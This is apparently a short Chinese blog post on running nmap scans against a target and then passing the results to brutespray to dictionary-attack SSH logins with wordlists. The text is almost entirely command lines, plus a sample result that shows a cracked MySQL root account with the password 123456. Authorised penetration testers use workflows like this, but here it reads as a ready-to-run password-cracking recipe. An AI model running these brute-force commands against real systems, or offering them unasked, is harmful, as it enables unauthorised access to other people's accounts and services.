1、端口/服务扫描

    全面扫描:nmap-T4 -A targetip  

    主机发现:nmap-T4 -sn targetip  

    端口扫描:nmap-T4 targetip  

    服务扫描:nmap-T4 -sV targetip  

    操作系统扫描:nmap-T4 -O targetip

示例:

    nmap -T4-p 22 -v 127.0.0.1 -oX 22.xml

2、指定服务进行字典爆破

nohup python2.7 brutespray.py --file 22.xml -s ssh -U /srv/install/brutespray-master/wordlist/ssh/user -P /srv/install/brutespray-master/wordlist/ssh/password --threads 20 --hosts 1 &

//-s执行爆破的服务,不带该参数默认爆破所以nmap扫描的服务,建议服务见分开爆破,使用不同的用户字典和密码字典

结果:

127.0.0.1
mysql:3306    root    123456
最后修改:2018 年 10 月 13 日 10 : 55 PM
如果觉得我的文章对你有用,请随意赞赏